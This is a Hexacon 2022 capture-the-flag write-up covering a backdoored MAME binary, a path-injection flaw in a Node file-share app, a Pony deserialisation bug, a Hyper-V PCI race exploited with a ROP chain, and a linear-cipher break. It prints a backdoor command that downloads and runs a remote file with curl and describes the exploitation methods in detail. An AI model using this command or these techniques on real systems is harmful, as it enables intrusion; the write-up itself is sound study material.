# Hexacon 2022 - CTF

## Step 1 - Backdoored game

For the first step we are given a CTF archive containing some challenges as well as the 
`.bash_history` of our unlucky friend who lost all his zero days. Looking at the history
and the CTF executables we quickly understand that **games300** is probably the backdoored
binary:

```
$ cat ./bash_history
cd ~/chall/games300
vi readme.txt
ls -l mame0240
./mame0240
ldd mame0240
apt-get install mame
ldd mame0240
wget https://www.mamedev.org/roms/alienar/alienar.zip -O /tmp/alienar.zip
ls -l /tmp/alienar.zip
unzip -l /tmp/alienar.zip
./mame0240 -rp /tmp alienar
./mame0240 -rp /tmp alienar
gdb ./mame0240
wget https://www.mamedev.org/roms/alienar/alien_arena_stuff.pdf
evince alien_arena_stuff.pdf
rm alien_arena_stuff.pdf
./mame0240 -rp /tmp alienar
./mame0240 -rp /tmp alienar
./mame0240 -rp /tmp alienar
gdb ./mame0240
cat ~/FLAG
netstat
netstat -ntaupe
netstat -ntaupe | grep -v 443 | grep -v 80
ps awx
netstat -ntaupe
ps axwww
ls ~/0days/
netstat -ntaupe
ps axwww
```

**Games300** directory contains the following `readme`:

```
$ cat ./readme.txt
Do you like retrogaming? Do you like old-school CPUs?

We prepared for you a special version of mame https://github.com/mamedev/mame

We git cloned for the challenge: https://github.com/mamedev/mame/tree/mame0240

This mame binary has been patched by our team to play "Alien Arena" (1985)! In
all its shining glory, with not less than 8 (yes, eight!) colors on screen,
awesome sounds, and incomprehensible gameplay! Try it and you'll love it (or
not)! You can read full description of the game here:
https://www.mamedev.org/roms/alienar/

[...]
```

The provided *Mame* binary being pretty huge, I decided to **Bindiff** it with a 
non-backdoored binary (that I compiled with the same toolchain) to identify the 
differences and spot the backdoored function:

![images of the bindiff output](./images/bindiff_result.png)

![images of the bindiff output](./images/bindiff_graph.png)

I was actually very surprised that it worked so well; the most difficult/long part was 
definitively to compile *Mame*. The analysis of the backdoored function shows the bash 
command executed:

```
echo flag is Retr0G4ming_4_Evercurl -k -s https://fileshare.fr/rest/download/917a21561b01ce0ff51a064e2362d2c3070192809a3170755d1f385925d8185ee2f8ae9d3d9ab8c172e9324aae6d9807/ef676bd0-d321-40ae-b7e5-f5a88dd2a77b/raw -o /tmp/.a && chmod +x /tmp/.a && /tmp/.
```

Requesting the URL allows to get the flag for this step `HXN{2a00d593c02a8fb2b40ad99a168cf7a4}`.

*Note*: looking at cross-references to `system` allows to find the backdoored function way
more easily but that's not how I did:

![xref to system()](./images/xref_to_system.png)

## Step 2 - Vulnerable website

At first, I though [Fileshare website](https://fileshare.fr) was a legitimate French 
filesharing website, however after some Googling we can find the 
[Github repo](https://github.com/fileshare-dev/fileshare):

![Googling FileShare](./images/googling_fileshare.png)

Looking at the issues, we find only one which sounds promising:

![0day inside](./images/0day_inside.png)

Back to the source code, we identify the following function which contains an interesting 
comment which could be related to the previous issue:

```js
module.exports = {
  createBackendUrl: function (uri, query = '') {
    let host = config.BACKEND_HOST;
    let port = config.BACKEND_PORT;
    //FIXME I'm lazy
    //normalize path to remove double slashes not handled by express
    return `http://${host}:${port}${path.normalize('/' + uri)}?${query}`;
  }
};
```

As its name indicates, this function is used to return a *backend URL* that does not
contains any `..`. After a quick search, we identify that this function is used multiple 
times, however, when calling the endpoint **/:uid/files/:filename** (using *GET* 
and *DELETE* methods), we identify that some parameters are passed without any ReGeX 
filtering.

Here is the example for the *GET* endpoint:

```js
router.get('/:uid/files/:filename', async function (req, res, next) {
  let uid = req.params.uid;
  let filename = req.params.filename;
  if (!new RegExp('^[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}$').test(uid)) {
    return res.send({
      error: true,
      message: "Share uid is not valid."
    });
  }
  let url = utils.createBackendUrl(
    makeShareFileRoute(uid, filename));
  let token = req.headers['authorization'];

  let response = null;
  try {
    response = await axios.get(url, {headers: {"Authorization": token}});
  } catch (err) {
    if(typeof err.response !== "undefined")
      response = err.response
    else
      response = {status: 500, data: "Internal error."};
  }
  res.status(response.status).send(response.data);
});
```

In this case, only the `uid` parameter is controlled using a ReGeX while `filename` is 
directly passed to `makeShareFileRoute` to create a backend URL:

```js
function makeShareFileRoute(shareUuid, name) {
  let sanitizedFilename = path.basename(name);
  return shareFileRouteTpl.replace(':uuid:', shareUuid)
    .replace(':filename:', sanitizedFilename);
}
```

By looking at *String.replace* documentation we can see that the second parameter (function 
`replace(pattern, replacement)`) can have specific values as:

- `$&`: insert the matched substring.
- `` $` ``: inserts the portion of the string that precedes the matched substring.
- `$'`: inserts the portion of the string that follows the matched substring.

In particular, we can use `$'` to insert `/` inside the sanitised filename we are able to 
send *GET* request to the backend on any endpoint (including the debug ones). Moreover, if
we look carefully at the configuration of the backend we can see the following code:

```js
router.use(override('_method',
  {methods: ['PATCH', 'DELETE', 'PUT', 'GET', 'POST']}));
```

This means that we can override the HTTP method by sending a *_method* argument.

Finally, I wrote [this exploit](./scripts/step2_exploit.py) to grant myself an access
to the share and download the file associated.

The flag for this step is *HXN{be0a73cc0886464f158eafc28138292d}*.

## Step 3 - Not so safe language

This challenge start with the following Pony executable:

```
$ file payload.bin
payload.bin: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, 
interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, 
BuildID[sha1]=6655ce8c0936a02919e27830adcd1caff217833f, not stripped
```

This binary can be executed as a client or as server depending on the arguments 
provided on the command line. A quick look at the strings allows to identify it as a 
[Pony executable](https://www.ponylang.io).

According to the website *Pony is an open-source, object-oriented, actor-model, 
capabilities-secure, high-performance programming language*. A quick analysis of the 
executable allows to identify the use of object serialization to communicate between the
client and the server. To understand how Pony object serialization works I looked at the 
serialization/deserialization routine on [Ponyc Github repository](
https://github.com/ponylang/ponyc/blob/7d38ffa91cf5f89f94daf6f195dfae3bd3395355/src/libponyrt/gc/serialise.c)
and especially at `pony_deserialise_offset`:

```c
PONY_API void* pony_deserialise_offset(pony_ctx_t* ctx, pony_type_t* t,
  uintptr_t offset)
{
  if(offset == ALL_BITS)
    return NULL;

  if((offset & HIGH_BIT) != 0)
  {
    offset &= ~HIGH_BIT;

    if(offset > desc_table_size)
      return NULL;

    t = desc_table[offset];
    return t->instance;
  }

  serialise_t k;
  k.key = offset;
  size_t index = HASHMAP_UNKNOWN;
  serialise_t* s = ponyint_serialise_get(&ctx->serialise, &k, &index);

  if(s != NULL)
    return (void*)s->value;

  if(t == NULL)
  {
    if((offset + sizeof(uintptr_t)) > ctx->serialise_size)
    {
      serialise_cleanup(ctx);
      ctx->serialise_throw();
      abort();
    }

    uintptr_t id = *(uintptr_t*)((uintptr_t)ctx->serialise_buffer + offset); // [0]
    t = desc_table[id]; // [1]
  }

  if(t->instance != NULL)
    return t->instance;

  if((offset + t->size) > ctx->serialise_size)
  {
    serialise_cleanup(ctx);
    ctx->serialise_throw();
    abort();
  }

  // [2.a]
  void* object;
  if(t->final == NULL)
    object = ctx->serialise_alloc(ctx, t->size);
  else
    object = ctx->serialise_alloc_final(ctx, t->size);

  // [2.b]
  memcpy(object, (void*)((uintptr_t)ctx->serialise_buffer + offset), t->size);

  s = POOL_ALLOC(serialise_t);
  s->key = offset;
  s->value = (uintptr_t)object;
  s->t = t;

  ponyint_serialise_putindex(&ctx->serialise, s, index);

  // [3]
  recurse(ctx, object, t->deserialise);
  return object;
}
```

To deserialize an object at *offset*, `pony_deserialise_offset` performs several
operations. In [0], the identifier of the object is retreive and then, without any check,
this identifier is used as an index inside `desc_table`; this leads to an out-of-bound
access. Then, some space is allocated to store the object ([2.a], [2.b]). Finally, since an
object can embed other objects, the `deserialise` method of the object is called ([3]).

With this quick review we can already create a malicious scenario:

- craft a fake object type in memory (with a malicious `deserialise` function)

- send a special stream to make `t = desc_table[id];` points to our fake obejct

However, to achieve this scenario we need a leak; this is quickly found by looking at the
string deserialisation handler:

```c

typedef struct string_obj {
  uint64_t type;
  size_t len;
  size_t capacity;
} string_obj_t;

void *__fastcall String_Deserialise(void *ctx, string_obj_t *string_obj)
{
  void *result;

  string_obj->type = (__int64)&Pony_String_Primitive;
  result = pony_deserialise_block(
                ctx, (uintptr_t)string_obj->data, string_obj->capacity); // [0]
  string_obj->data = result;
  return result;
}

// From ponyc source code
PONY_API void* pony_deserialise_block(pony_ctx_t* ctx, uintptr_t offset,
  size_t size)
{
  if(offset == ALL_BITS)
    return NULL;

  // Allocate the block, memcpy to it.
  if((offset + size) > ctx->serialise_size)  // [1]
  {
    serialise_cleanup(ctx);
    ctx->serialise_throw();
    abort();
  }

  void* block = ctx->serialise_alloc(ctx, size);
  memcpy(block, (void*)((uintptr_t)ctx->serialise_buffer + offset), size); // [2]
  return block;
}
```

To deserialise a string the function `pony_deserialise_block` is called to copy the actual
content of the string using two attacker controlled parameters `offset` and `size`. In [1],
a check is performed to ensure we cannot read after the serialised buffer during the
deserialisation. However, without overflow check, it is possible to pass a negative
offset to read before the deserialised buffer (see [2]).

## Step 4 - PCI racing

During the previous step, we compromised a Linux virtual machine that is running as a 
guest on a Hyper-V server. By looking at the `/root` directory we can find instructions
and some materials for the step 4.

A custom driver named *mm_device* is running on the Linux machine and allow us to map and
reserve (guest) physical memory; also a look at the output of the `lspci` command allows
to get some information about the PCI device emulated using the userland library 
`pci_device.dll` running on the Windows 11 host. Here is an overview of the architecture:

[!PCI device scheme](./images)

The Windows kernel driver `host_pci_installer.sys` is mostly used to handle the 
communication with the VMBUS but isn't really interesting for solving the challenge. 
All the device logic is actually implemented inside the userland library `pci_device.dll`; 
here are some interesting functions:

```c
__int64 __fastcall Device::WriteInterceptedGpup(
        mbi_Device *this,
        struct _LUID *a2,
        enum __MIDL_IGPUPMitigationDevice_0001 MitigationDevice,
        unsigned __int64 Offset,
        size_t Size,
        const unsigned __int8 *Src)

__int64 __fastcall Device::ReadInterceptedGpup(
        mbi_Device *this,
        struct _LUID *a2,
        enum __MIDL_IGPUPMitigationDevice_0001 a3,
        unsigned __int64 Offset,
        size_t Size,
        unsigned __int8 *dst)
```

These functions are used to handle the read/write operation to the memory mapped 
configuration area between the guest and the host. Using this configuration area, the guest
can notably send file to the host (the files are saved in `C:\exploits\`). This operation
can be performed in the following modes:

- single thread mode: in this mode all the parameters required to perform the operation
are stored in the configuration area which is managed by the device dll.

- multi thread mode: in this mode the worker items are stored in another buffer belonging
to the guest memory and not managed by the device dll.

Here is the code that is executed by the thread in *multi-thread mode*:

```cpp
void __fastcall WorkerThread::Run(mbi_WorkerThread *this)
{
  char *data_ptr; // [rsp+20h] [rbp-4B8h]
  int crc_value; // [rsp+28h] [rbp-4B0h]
  void *like_data_ptr_bis; // [rsp+30h] [rbp-4A8h]
  unsigned __int64 size; // [rsp+38h] [rbp-4A0h]
  char *like_data_ptr; // [rsp+48h] [rbp-490h]
  char *v6; // [rsp+58h] [rbp-480h]
  char *v7; // [rsp+68h] [rbp-470h]
  char v8[32]; // [rsp+78h] [rbp-460h] BYREF
  char v9[40]; // [rsp+98h] [rbp-440h] BYREF
  char local_buffer[1024]; // [rsp+C0h] [rbp-418h] BYREF

  while ( !Thread::thread_should_stop((mbi_MultiThread *)this) )
  {
    if ( WorkerThread::HasPendingWork(this) )
    {
      size = this->WorkItem->Size; // [0]
      if ( size <= 0x400 ) // [1]
      {
        data_ptr = local_buffer;
      }
      else
      {
        like_data_ptr_bis = operator new[](size);
        if ( like_data_ptr_bis )
        {
          memset(like_data_ptr_bis, 0, size);
          like_data_ptr = (char *)like_data_ptr_bis;
        }
        else
        {
          like_data_ptr = 0i64;
        }
        data_ptr = like_data_ptr;
      }
      if ( data_ptr )
      {
        Device::CopyDataFromGuest(
            this->Device,
            data_ptr,
            this->WorkItem->Addr,
            this->WorkItem->Size
        ); // [2]
        crc_value = ComputeCRC32(data_ptr, this->WorkItem->Size); // [3]
        if ( this->WorkItem->Crc == crc_value )
        {
          SaveToHostFile(data_ptr, this->WorkItem->Size); // [4]
        }
        else
        {
          v6 = (char *)std::string::string(v8, "Invalid CRC of file in Multi mode.");
          Device::DebugErrorMessageAsync(this->Device, v6);
          this->WorkItem->Crc = crc_value;
        }
      }
      else
      {
        v7 = (char *)std::string::string(v9, "Invalid size of file in Multi mode.");
        Device::DebugErrorMessageAsync(this->Device, v7);
        this->WorkItem->Crc = -1;
      }
      if ( data_ptr != local_buffer )
        operator delete[](data_ptr);
      ++this->WorkItem;
      --this->NElem;
    }
    else
    {
      Thread::thread_sleep((Thread *)this);
    }
  }
  Thread::thread_set_stopping((Thread *)this);
}
```

In [0], the size of the work item is read from the shared buffer, if this size is lower or
equal to *0x400* ([2]), the destination address is configured to point to a stack buffer
else a buffer with the appropriate length. Then, the data is copied from the guest to the 
host [3], a CRC32 is computed [3] to ensure that the data transfered hasn't been tampered and 
finally the content is saved on the host filesystem in [4].

Looking at this function, it is obvious that there is a race condition between [0] and [3],
that can be exploited in different manners assuming that `this->WorkItem->Size <= 0x400` 
during the check [1]:

- Modifying `this->WorkItem->Size` between [1] and [2]: in this case, we can trigger an 
out-of-bound write by setting a value greater that `0x400`; this lead to a stack based 
buffer overflow.

- Modifying `this->WorkItem->Size` between [2] and [3]: in this case, we can cause an 
out-of-bound read by using the computed checksum.

Finally, the strategy to exploit this program is pretty simple:

- First, we use the out-of-bound read to leak information from the stack (cookie, return 
address)

- Second, we use the out-of-bound write to smash the stack and put a ROP chain.

Note: I've built different ROP chains to perform the following operations:

- List files from `C:\exploits\`;

- Read files from `C:\exploits\` knowing their name.

Finally using [the exploit](./scripts/step4_exploit/) we can extract the following files:
- `flag.txt`: text file containing the flag for this step
- `encrypt.exe`: a huge PE32+ executable used to encrypt the files
- `0day.py.enc`: the encrypted flag for the step 5
- `test.py`: a simple Python script
- `test.py.enc`: an encrypted version of `test.py`

Here is a short video of the running exploit:

![Step 4 exploit video](./images/step4_exploit.mov)

The flag for this step is *HXN{86b519eee1439add0dc5fc18d4c57815}*. 

## Step 5 - Linear cryptography

After a quick analysis we discover that the encryption executable 
is a *pyinstaller* binary. To extract the "original" Python script
we use [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor)
to extract the "original" [the Python script](./scripts/step5_decrypt.py) which is 
used to encrypt the files. 

A block-encryption algorithm is used and the routine is given here:

```python
class LEA:
    # ...

    def _encrypt_block(self, block):
        state = bytes_to_words(block)
        for i in range(24):
            old_state = state[:]
            state[0] = rotate_left(old_state[0] ^ self.round_keys[i][0] ^ old_state[1] ^ self.round_keys[i][1], 9)
            state[1] = rotate_right(old_state[1] ^ self.round_keys[i][2] ^ old_state[2] ^ self.round_keys[i][3], 5)
            state[2] = rotate_right(old_state[2] ^ self.round_keys[i][4] ^ old_state[3] ^ self.round_keys[i][5], 3)
            state[3] = old_state[0]

        return words_to_bytes(state)
```

The encryption algorithm uses one key and each round perform the following 
operations on the state `state[i+1] := M * (state[i] ^ rk[i])` which can
also be written  `state[i+1] := (M * state[i]) ^ (M * rk[i])`. Hence, by
induction we have `final_state := (M ** 24) * init_state + C` where C is
a value independant from the input state (ie. the cleartext). This means 
that if we have a cleartext and the associated ciphertext we can compute
C; then, we can use it to decrypt the flag (assuming they both have been
encrypted using the same key):

```python
def inv_f(block):
    state = bytes_to_words(block)

    for i in range(24):
        old_state = state[:]
        state[0] = old_state[3]
        state[1] = rotate_right(old_state[0], 9)  ^ old_state[3]
        state[2] = rotate_left(old_state[1], 5) ^ state[1]
        state[3] = rotate_left(old_state[2], 3) ^ state[2]

    return words_to_bytes(state)

# First 16 bytes from test.py
init_state      = bytes.fromhex("696d 706f 7274 2072 6571 7565 7374 730a")

# First 16 bytes from test.py.env
final_state     = bytes.fromhex("e31a ec64 8133 8430 18f8 abde e58d 3067")

# Image of the final state through inv_f
img_final_state = inv_f(final_state)

# Xor value
xor_val = [*map(xor, img_final_state, init_state)]
```

Running the [decryption script](./step5/decrypt.py) gives the final flag 
*HXN{1355239c59f759bd56e13b3432a9b49c}*.

## Conclusion

Thanks to the organisers for the cool challenge and thanks to 
[@brendel](https://mobile.twitter.com/__brendel) for motivating me to 
continue after the step 1 and for setting me up a test machine for the 
step 4:)